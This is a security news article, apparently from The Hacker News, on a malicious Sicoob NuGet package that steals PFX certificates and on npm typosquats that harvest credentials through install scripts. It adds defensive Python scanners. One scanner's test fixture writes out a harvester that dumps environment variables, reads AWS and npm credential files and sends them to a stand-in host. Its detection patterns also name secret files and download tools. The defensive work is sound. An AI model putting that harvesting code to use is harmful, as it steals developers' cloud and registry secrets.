Malicious Sicoob NuGet Package Exfiltrates Banking Credentials, Amid Surge in npm Package Attacks


Cybersecurity researchers have identified a malicious NuGet package posing as a C# software development kit for Sicoob, one of Brazil's largest cooperative financial systems. The package is built to steal client IDs and PFX certificate files, the credentials that authenticate a business's integration to the Sicoob banking APIs.

Discovery of the Malicious Package

Versions 2.0.0 through 2.0.4 of the package, named "Sicoob.Sdk", contain code that exfiltrates sensitive material, including PFX files. A PFX file bundles a certificate with its private key, and it is what a business uses to automate banking operations such as processing instant payments and generating dynamic Pix QR codes. The malicious versions are estimated to have been downloaded nearly 500 times, so the number of integrations whose keys may have left the host is not small.

According to security researcher Kirill Boychenko, when a developer initializes the SicoobClient with a client ID, PFX file path, and PFX password, the package reads the PFX file from disk, Base64-encodes its contents, and sends the client ID, PFX password, and encoded PFX data to a hard-coded third-party Sentry endpoint. Sentry is a legitimate error-monitoring service, so the outbound request looks like ordinary crash telemetry rather than an exfiltration channel, which makes it easy to miss in network logs. A developer who integrates the package as documented hands over everything needed to act as their integration.

Broader Implications for Financial Transactions

The malicious package also captures raw Boleto API responses and sends them through a separate Sentry path. Boleto is a widely used payment slip method in Brazil, covering both online and offline transactions. The exposed transaction details, including payment status, amounts, due dates, identifiers, and payer or payee data, could lead to severe financial repercussions for affected users.

With the exfiltrated data, a threat actor can authenticate to Sicoob's APIs as the victim's own integration, which is what makes this theft more serious than a leaked password. Following responsible disclosure, NuGet has blocked the malicious package. The publisher profile behind it, named "sicoob", also lists 11 other NuGet packages with roughly 6,000 downloads between them.

The Role of AI in Amplifying Threats

The application security company Socket reported that the malicious package was surfaced by Google Search AI Mode as a legitimate C# library for interacting with Sicoob banking APIs. This amplification could mislead unsuspecting developers searching for legitimate tools, increasing the likelihood of accidental integration of the malicious package into their projects.

Another critical aspect of this attack is the mismatch between the source code in the linked GitHub repository and the artifact distributed via NuGet. The repository appears clean and legitimate, which lends the package an air of authenticity, but the compiled DLL inside the .nupkg is what developers actually run, and that is where the malicious functionality lives. A clean repository says nothing about a package unless the published artifact is verifiably built from it.
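The practical consequence of that mismatch is that the artifact itself has to be inspected. The following Python scanner is an added example, not code from the article or from the package's authors: it opens a .nupkg (a zip archive), pulls printable strings out of every DLL in both ASCII and UTF-16LE (the encoding .NET uses for C# string literals), and flags Sentry DSNs, other URLs, and the .NET APIs needed to read and Base64-encode a PFX file. The sample package, its DSN and its hostnames are constructed for the example and are hypothetical.

```python
"""Inspect a .nupkg artifact for hard-coded exfiltration endpoints.

A .nupkg is a zip archive, and the compiled DLLs inside it are what a
developer actually runs, whatever the linked GitHub repository contains.
This scanner pulls printable strings out of every DLL (ASCII and UTF-16LE,
since .NET stores C# string literals as UTF-16) and flags Sentry DSNs, other
URLs and the APIs needed to read and encode a PFX file.
The sample package is constructed in memory for this example.
"""
import io
import re
import zipfile

# Sentry DSN shape: https://<public key>@<org>.ingest.sentry.io/<project id>
SENTRY_DSN = re.compile(rb"https?://[0-9a-f]{8,}@[A-Za-z0-9.-]*sentry\.io/\d+")
ANY_URL = re.compile(rb"https?://[A-Za-z0-9./?=_%:-]+")
# .NET APIs a PFX-stealer needs: load the cert, read the file, Base64 it.
PFX_APIS = (b"X509Certificate2", b"File.ReadAllBytes", b"ToBase64String")


def extract_strings(data: bytes, min_len: int = 8):
    """Yield printable strings from raw bytes as ASCII and as UTF-16LE."""
    ascii_run = rb"[\x20-\x7e]{%d,}" % min_len
    utf16_run = rb"(?:[\x20-\x7e]\x00){%d,}" % min_len
    for m in re.finditer(ascii_run, data):
        yield m.group()
    for m in re.finditer(utf16_run, data):
        yield m.group()[::2]  # drop the interleaved zero bytes


def scan_nupkg(nupkg_bytes: bytes) -> dict:
    """Return the DLLs in the package and the suspicious strings found."""
    dsns, urls, apis, dlls = set(), set(), set(), []
    with zipfile.ZipFile(io.BytesIO(nupkg_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.lower().endswith(".dll"):
                continue
            dlls.append(name)
            for s in extract_strings(pkg.read(name)):
                hit = SENTRY_DSN.search(s)
                if hit:
                    dsns.add(hit.group().decode("ascii"))
                    continue
                for url in ANY_URL.findall(s):
                    urls.add(url.decode("ascii"))
                for api in PFX_APIS:
                    if api in s:
                        apis.add(api.decode("ascii"))
    return {"dlls": dlls, "sentry_dsns": sorted(dsns),
            "urls": sorted(urls), "pfx_apis": sorted(apis)}


def is_suspicious(report: dict) -> bool:
    """A telemetry DSN next to PFX-loading and Base64 APIs is the pattern
    described in the article; treat it as worth a manual decompile."""
    return bool(report["sentry_dsns"]) and {"X509Certificate2",
        "ToBase64String"} <= set(report["pfx_apis"])


def build_sample_nupkg() -> bytes:
    """Constructed fixture: a minimal package whose fake DLL carries the
    strings a malicious build would. The DSN and hostnames are hypothetical."""
    dsn = "https://0123456789abcdef0123456789abcdef@o000000.ingest.sentry.io/1234567"
    fake_dll = (
        b"MZ" + b"\x00" * 64
        + "X509Certificate2".encode("utf-16-le") + b"\x00\x00"
        + dsn.encode("utf-16-le") + b"\x00\x00"
        + b"File.ReadAllBytes\x00ToBase64String\x00"
        + b"https://api.example.com/boletos\x00"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("Example.Sdk.nuspec", "<package/>")
        pkg.writestr("lib/netstandard2.0/Example.Sdk.dll", fake_dll)
    return buf.getvalue()


if __name__ == "__main__":
    import json
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_nupkg()
    report = scan_nupkg(data)
    print(json.dumps(report, indent=2), "\nsuspicious:", is_suspicious(report))
```

Run it against a downloaded package with `python scan_nupkg.py Some.Package.1.2.3.nupkg`. A string scan is a triage step, not proof: a DSN hit next to X509Certificate2 and ToBase64String tells you to decompile the DLL (ILSpy or a similar tool) and read what is done with the PFX bytes, and a clean scan does not rule out code that assembles its endpoint at runtime.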

Recommendations for Affected Organizations

Organizations that have installed the "Sicoob.Sdk" package should act immediately: remove the package, treat any PFX material it could have read as compromised, reissue the exposed certificates with new private keys, rotate PFX passwords, and change or disable the affected client IDs where applicable. Because the PFX file was exfiltrated together with its password, rotating the password alone achieves nothing; the certificate and its key must be replaced. Sicoob authentication and API logs should also be audited for unusual activity, such as API calls from unfamiliar source addresses or outside normal operating hours, to limit the damage.
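The first step in that remediation is knowing which builds pulled the package in. The script below is an added example, not from the article or from Sicoob: it walks a source tree for SDK-style and legacy .csproj files (PackageReference entries) and packages.lock.json files and reports every reference to Sicoob.Sdk at a version in the 2.0.0 to 2.0.4 range the article names. Version ranges and floating versions in a .csproj are reported as "unparsed" so that the lock file, which records the version actually restored, gets checked. The sample project tree is constructed in a temporary directory for the example.

```python
"""Find every project that references an affected Sicoob.Sdk version.

Walks a source tree for .csproj (PackageReference) and packages.lock.json
files and reports each reference to Sicoob.Sdk whose version falls in the
affected 2.0.0-2.0.4 range. A .csproj may carry a range or a floating
version; those are reported as "unparsed" so the lock file, which records
the version NuGet actually restored, is consulted instead.
The sample tree is constructed in a temporary directory for this example.
"""
import json
import os
import re
import tempfile
import xml.etree.ElementTree as ET

PACKAGE_ID = "sicoob.sdk"            # NuGet package IDs are case-insensitive
AFFECTED_MIN, AFFECTED_MAX = (2, 0, 0), (2, 0, 4)
NUMERIC = re.compile(r"^(\d+)(?:\.(\d+))?(?:\.(\d+))?")


def classify(version: str) -> str:
    """'affected', 'unaffected', or 'unparsed' for a range/floating version."""
    m = NUMERIC.match(version.strip())
    if not m or "*" in version:
        return "unparsed"
    # pre-release suffixes ('2.0.3-beta') are ignored: same base version
    v = tuple(int(p or 0) for p in m.groups())
    return "affected" if AFFECTED_MIN <= v <= AFFECTED_MAX else "unaffected"


def refs_in_csproj(path: str):
    """Yield the version string of each PackageReference to the package."""
    for el in ET.parse(path).getroot().iter():
        if el.tag.split("}")[-1] != "PackageReference":  # tolerate xmlns
            continue
        pkg = el.get("Include") or el.get("Update") or ""
        if pkg.lower() != PACKAGE_ID:
            continue
        version = el.get("Version")
        if version is None:  # <Version> may also be a child element
            child = next((c for c in el if c.tag.split("}")[-1] == "Version"), None)
            version = child.text if child is not None else ""
        yield version or ""


def refs_in_lock(path: str):
    """Yield the resolved versions of the package from packages.lock.json."""
    with open(path, encoding="utf-8") as fh:
        lock = json.load(fh)
    for framework in lock.get("dependencies", {}).values():
        for pkg, info in framework.items():
            if pkg.lower() == PACKAGE_ID:
                yield info.get("resolved", "")


def scan_tree(root: str) -> list:
    """Return [{'file', 'version', 'status'}] for every reference found."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if name.endswith(".csproj"):
                versions = refs_in_csproj(full)
            elif name == "packages.lock.json":
                versions = refs_in_lock(full)
            else:
                continue
            for v in versions:
                findings.append({"file": rel, "version": v, "status": classify(v)})
    return sorted(findings, key=lambda f: (f["file"], f["version"]))


def build_sample_tree() -> str:
    """Constructed fixture: one project pins an affected version, the other
    declares a range whose lock file resolved to a version inside the range."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "app"))
    os.makedirs(os.path.join(root, "svc"))
    with open(os.path.join(root, "app", "App.csproj"), "w") as fh:
        fh.write('<Project Sdk="Microsoft.NET.Sdk"><ItemGroup>'
                 '<PackageReference Include="Sicoob.Sdk" Version="2.0.3" />'
                 '<PackageReference Include="Newtonsoft.Json" Version="13.0.3" />'
                 '</ItemGroup></Project>')
    with open(os.path.join(root, "svc", "Svc.csproj"), "w") as fh:
        fh.write('<Project Sdk="Microsoft.NET.Sdk"><ItemGroup>'
                 '<PackageReference Include="sicoob.sdk"><Version>[2.0.0,3.0.0)</Version>'
                 '</PackageReference></ItemGroup></Project>')
    with open(os.path.join(root, "svc", "packages.lock.json"), "w") as fh:
        json.dump({"version": 1, "dependencies": {"net8.0": {
            "Sicoob.Sdk": {"type": "Direct", "requested": "[2.0.0,3.0.0)",
                           "resolved": "2.0.1", "contentHash": "constructed"}}}}, fh)
    return root


if __name__ == "__main__":
    import sys
    for f in scan_tree(sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()):
        print(f"{f['status']:<10} {f['version']:<16} {f['file']}")
```

Source trees are not the only place to look: the NuGet global packages folder (by default ~/.nuget/packages/sicoob.sdk/<version>/ on developer machines and build agents) shows which versions were ever restored on that host, which matters because the exfiltration happens at runtime on whatever machine initialized the client, including CI runners that held the PFX.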

Context of Recent npm Package Attacks

This incident coincides with the discovery of 14 malicious npm packages that typosquat well-known libraries, including OpenSearch and Elasticsearch. These packages harvest AWS credentials, HashiCorp Vault tokens, npm tokens, and CI/CD pipeline secrets from the host through an npm preinstall script, which runs automatically during installation, before any of the package's code is imported by the application.

The Microsoft Defender Security Research Team reported that these malicious packages were published by a single threat actor identified as "vpmdhaj". The packages include names such as "@vpmdhaj/devops-tools" and "@vpmdhaj/elastic-helper", among others. This campaign is part of a broader trend of supply chain attacks on the npm ecosystem, which has seen a sharp rise in malicious activity.
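Because the harvesting happens in an install-time lifecycle script, the useful check is an inventory of which installed packages declare one and what those scripts do. The audit below is an added example, not code from Microsoft's report or from the article: it walks a node_modules tree, reports every package with a preinstall, install or postinstall script, follows the script to any local file it executes, and scores the code for credential-harvesting indicators so that benign native builds are not buried under alerts. The node_modules tree is constructed in a temporary directory for the example; the package names and hostnames in it are hypothetical.

```python
"""Audit a node_modules tree for install-time lifecycle scripts.

npm runs a package's preinstall, install and postinstall scripts
automatically during `npm install`. This scanner lists every installed
package that declares one, reads any local script file the hook runs, and
scores the combined text for credential-harvesting indicators.
The node_modules tree is constructed in a temporary directory for this
example; package names and hostnames are hypothetical.
"""
import json
import os
import re
import tempfile

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")
INDICATORS = {
    "env_dump": r"process\.env|printenv|os\.environ",
    "secret_files": r"\.aws/credentials|\.npmrc|\.docker/config\.json|\.vault-token",
    "network": r"\bcurl\b|\bwget\b|https?://|fetch\(|\.request\(",
    "encoding": r"base64|Buffer\.from|atob\(|eval\(",
}
SCRIPT_FILE = re.compile(r"([\w./-]+\.(?:js|cjs|mjs|sh))")


def hook_source(pkg_dir: str, command: str) -> str:
    """The hook command plus the contents of any local script file it runs."""
    text = command
    base = os.path.abspath(pkg_dir)
    for ref in SCRIPT_FILE.findall(command):
        path = os.path.normpath(os.path.join(base, ref))
        if path.startswith(base) and os.path.isfile(path):  # stay inside the package
            with open(path, encoding="utf-8", errors="replace") as fh:
                text += "\n" + fh.read()
    return text


def audit_node_modules(root: str) -> list:
    """Return one finding per (package, hook), with the indicators matched."""
    findings = []
    for dirpath, _, files in os.walk(root):
        if "package.json" not in files:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (ValueError, OSError):
            continue
        scripts = manifest.get("scripts") or {}
        for hook in LIFECYCLE_HOOKS:
            if hook not in scripts:
                continue
            text = hook_source(dirpath, scripts[hook])
            hits = sorted(k for k, pat in INDICATORS.items() if re.search(pat, text))
            findings.append({
                "package": manifest.get("name", os.path.relpath(dirpath, root)),
                "version": manifest.get("version", "?"),
                "hook": hook,
                "command": scripts[hook],
                "indicators": hits,
                # one indicator is common in legitimate build steps; two or more is not
                "severity": "high" if len(hits) >= 2 else "review",
            })
    return sorted(findings, key=lambda f: (f["package"], f["hook"]))


def build_sample_tree() -> str:
    """Constructed fixture: a harvester hidden behind an innocent-looking
    manifest, a native add-on with a legitimate install hook, and a plain
    library with no scripts at all."""
    root = tempfile.mkdtemp()

    def write(rel, content):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)

    write("@acme/devops-helper/package.json", json.dumps({
        "name": "@acme/devops-helper", "version": "1.0.2",
        "scripts": {"preinstall": "node setup.js"}}))
    write("@acme/devops-helper/setup.js",
          "const fs = require('fs'), os = require('os');\n"
          "let loot = JSON.stringify(process.env);\n"
          "for (const f of ['.aws/credentials', '.npmrc'])\n"
          "  try { loot += fs.readFileSync(os.homedir() + '/' + f, 'utf8'); } catch {}\n"
          "fetch('https://collector.example.invalid/' + Buffer.from(loot).toString('base64'));\n")
    write("native-addon/package.json", json.dumps({
        "name": "native-addon", "version": "4.1.0",
        "scripts": {"install": "node-gyp rebuild", "test": "mocha"}}))
    write("tiny-util/package.json", json.dumps({"name": "tiny-util", "version": "2.0.0"}))
    return root


if __name__ == "__main__":
    import sys
    for f in audit_node_modules(sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()):
        print(f"{f['severity']:<7} {f['package']}@{f['version']} {f['hook']}: "
              f"{f['command']}  indicators={f['indicators']}")
```

The scanner only sees packages already on disk, so it is a post-install audit; the preventive control is to stop hooks from running at all on machines that hold credentials, with `npm ci --ignore-scripts` in CI or `npm config set ignore-scripts true`, and then allow-list the few native add-ons that genuinely need a build step.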

Evolving Techniques in Supply Chain Attacks

Recent reports indicate that threat actors are moving beyond traditional typosquatting techniques, employing more sophisticated methods to create convincing package names that blend seamlessly into legitimate developer workflows. This evolution transforms routine installation steps into pathways for reconnaissance, credential theft, and further compromise.

Sonatype, a supply chain security company, noted that the broader pattern observed is one of manufactured legitimacy. Attackers are designing package names to appear plausible and useful, thereby increasing the chances of successful infiltration into development environments.

Conclusion

The emergence of the malicious Sicoob NuGet package highlights the ongoing vulnerabilities within software supply chains, particularly in the context of financial applications. As cyber threats continue to evolve, organizations must remain vigilant and proactive in their security measures to protect sensitive data and maintain the integrity of their systems.

Source: thehackernews.com

